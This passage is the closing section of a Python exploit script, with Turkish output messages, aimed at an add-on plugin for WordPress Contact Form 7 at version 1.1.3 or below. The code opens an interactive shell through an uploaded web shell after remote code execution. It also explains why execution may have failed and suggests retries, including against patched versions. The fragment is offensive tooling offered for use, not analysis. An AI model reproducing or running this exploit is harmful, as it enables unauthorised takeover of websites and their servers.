if args.interactive:
try:
interactive_shell(sess, result["shell_url"])
except KeyboardInterrupt:
out(C.warn("\n [!] Shell kapatıldı."))
else:
try:
ans = input(C.warn(
"\n [?] İnteraktif shell aç? (y/n): ")).strip().lower()
if ans == "y":
interactive_shell(sess, result["shell_url"])
except (KeyboardInterrupt, EOFError):
pass
elif result.get("uploaded"):
out(C.warn("\n ⚠ Shell yüklendi ancak RCE alınamadı."))
kv("Shell URL", result.get("shell_url",""), C.Y)
kv("Sebep", result.get("reason",""), C.DM)
out(C.dim("\n Olası nedenler:"))
out(C.dim(" 1. Apache .htaccess Content-Disposition:attachment engeli"))
out(C.dim(" 2. PHP execution upload dizininde devre dışı"))
out(C.dim(" 3. Nginx/LiteSpeed sunucularında engel olmayabilir"))
save_results([], uploaded=[result], outfile=args.output)
else:
reason = result.get("reason", "?")
out(C.fmt("\n ✗ Exploit başarısız.", C.R))
kv("Sebep", reason, C.DM)
out()
out(C.warn(" Öneriler:"))
out(C.dim(" 1. CF7 formu olan bir sayfa olduğundan emin olun"))
out(C.dim(" 2. Plugin aktif ve sürüm <= 1.1.3 olmalı"))
out(C.dim(" 3. -v verbose mod ile detayları inceleyin"))
out(C.dim(" 4. --no-skip-patched ile yamalı sürümü de deneyin"))
if __name__ == "__main__":
main()